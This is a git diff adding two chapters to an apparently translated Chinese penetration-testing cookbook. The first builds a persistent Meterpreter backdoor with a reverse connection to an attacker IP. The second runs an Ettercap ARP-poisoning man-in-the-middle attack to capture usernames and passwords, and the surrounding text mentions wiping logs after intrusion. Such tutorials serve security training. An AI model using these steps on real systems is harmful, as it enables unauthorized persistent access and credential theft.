diff --git a/ch7.md b/ch7.md index 35db973602bbfe951f9e16319415cdf01c6e5498..1444540042640d54d27c1bb107b426f355471d9f 100644 --- a/ch7.md +++ b/ch7.md @@ -329,3 +329,133 @@ ### 工作原理 这个秘籍中,我们使用 Meterpreter 来清理我们在目标主机上的踪迹。我们从 Meterpreter 中开始这个秘籍,并启动了 IRB(一个 Ruby 解释器 shell)。下面,我们指定了想要清理的文件,并且最后键入了`Log.clear `命令来清理日志。要记住,一旦我们黑进了某个主机,你需要在最后执行这一步。你不能在清理踪迹之后再执行更多的操作,这样只会更加更多的日志条目。 + +## 7.6 创建永久后门 + +这个秘籍中,我们会使用 Metasploit persistence 来创建永久后门。一旦你成功获得了目标机器的访问权限,你需要探索重新获得机器访问权的方式,而不需要再次黑进它。如果目标机器的用户做了一些事情来终端连接,比如重启机器,后门的作用就是允许重新建立到你机器的连接。这就是创建后门非常方便的原因,它可以让你控制目标机器的访问。 + +### 准备 + +为了执行这个秘籍,我们需要: + ++ 内部网络或互联网的连接。 + ++ 使用 Metasploit 框架的具有漏洞的主机。 + +### 操作步骤 + +让我们开始植入我们的永久后门。你需要使用 Metasploit 攻击某个主机来获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得目标主机的访问。 + +1. 一旦你通过 Metasploit 和 Meterpreter shell 获得了受害者的访问权限,等待你的 Meterpreter 显示提示符。 + + ![](img/7-6-1.jpg) + +2. 下面,我们需要运行 persistence,以便创建我们的后门。我们打开帮助文件: + + ``` + run persistence –h + ``` + +3. 永久后门有几个选项,包括: + + + `-A`:这个选项会自动启动一个匹配的多重处理器来链接到代理端。 + + + `-S`:这个选项让后门自动化启动为系统服务。 + + + `-U`:这个选项让后门在用户启动系统时自动启动。 + + + `-i`:这个选项设置两次尝试回复攻击者机器之间的秒数。 + + + `-p`:这个选项设置攻击者机器上 Metasploit 的监听端口。 + + + `-P`:这个选项设置所用的载荷。默认使用` Reverse_tcp `,并且它通常是你想使用的东西。 + + + `-r`:这个选项设置攻击者机器的 IP 地址。 + +4. 现在,我们指定命令来建立后门: + + ``` + run persistence –U –A –i 10 – 8090 –r 192.168.10.109 + ``` + +5. 后门现在已经建立了。如果成功的话,你会注意到你有了第二个 Meterpreter 会话。 + + ![](img/7-6-2.jpg) + +### 工作原理 + +这个秘籍中,我们使用 Meterpreter 来建立永久后门。我们在黑进目标主机并获得 Meterpreter shell 之后开始了这个秘籍。之后我们通过浏览帮助文档那个,探索了一些可用的永久化方式。最后,我们通过运行安装命令并设置它的选项来完成后门的安装。 + +## 7.7 中间人(MITM)攻击 + +这个秘籍中,我们会对目标进行中间人(MITM)攻击。MITM攻击允许我们窃听目标和别人的通信。在我们的例子中,当某个 Windows 主机在收发邮件时,我们使用 Ettercap 来窃听它的通信。 + +### 准备 + +为了执行这个秘籍,我们需要: + ++ 无线网络连接 + ++ 连接到无线网络的机器 + +### 操作步骤 + +让我们启动 Ettercap 来开始中间人攻击。 + +1. 打开终端窗口并启动 Ettercap。使用`-G`选项加载 GUI: + + ``` + ettercap –G + ``` + + ![](img/7-7-1.jpg) + +2. 我们以打开` Unified sniffing`(统一嗅探)开始。你可以按下`Shift + U`或者访问菜单中的` Sniff | Unified sniffing`。 + + ![](img/7-7-2.jpg) + +3. 选择网络接口。在发起 MITM 攻击的情况中,我们应该选项我们的无线接口。 + + ![](img/7-7-3.jpg) + +4. 下面,我们打开`Scan for hosts`(扫描主机)。可以通过按下`Ctrl + S`或访问菜单栏的` Hosts | Scan for hosts`来完成。 + + ![](img/7-7-4.jpg) + +5. 下面,我们得到了`Host List`(主机列表)。你可以按下`H`或者访问菜单栏的`Hosts | Host List`。 + + ![](img/7-7-5.jpg) + +6. 我们下面需要选择或设置我们的目标。在我们的例子中,我们选择`192.168.10.111`作为我们的`Target 1`,通过选中它的 IP 地址并按下` Add To Target 1 `(添加到目标 1)按钮。 + + ![](img/7-7-6.jpg) + +7. 现在我们能够让 Ettercap 开始嗅探了。你可以按下`Ctrl + W`或访问菜单栏的` Start | Start sniffing`。 + + ![](img/7-7-7.jpg) + +8. 最后,我们开始进行 ARP 毒化。访问菜单栏的`Mitm | Arp poisoning`。 + + ![](img/7-7-8.jpg) + +9. 在出现的窗口中,选中` Sniff remote connections`(嗅探远程连接)的选项。 + + ![](img/7-7-9.jpg) + +0. 取决于网络环境,我们会看到信息。 + + ![](img/7-7-10.jpg) + +1. 一旦我们找到了想要找的信息(用户名和密码)。我们可以关闭 Ettercap。你可以按下`Ctrl + E`或访问菜单栏的`Start | Stop sniffing`来完成它。 + + ![](img/7-7-11.jpg) + +2. 现在我们关闭 ARP 毒化,使网络恢复正常。 + + ![](img/7-7-12.jpg) + +### 工作原理 + +这个秘籍包括 MITM 攻击,它通过 ARP 包毒化来窃听由用户传输的无线通信。 + +> 你可以通过浏览来了解更多关于 MITM 的信息。 diff --git a/ch8.md b/ch8.md index 41c1119f607a00422effef19baf0211be8d9cc74..48636abd402543b81b09e7361a4b97416e8fdfec 100644 --- a/ch8.md +++ b/ch8.md @@ -175,7 +175,7 @@ Hydra 支持许多协议,包括(但不仅限于)FTP、HTTP、HTTPS、MySQL ### 准备 -这个秘籍需要局域网的链接。 +这个秘籍需要局域网的连接。 ### 操作步骤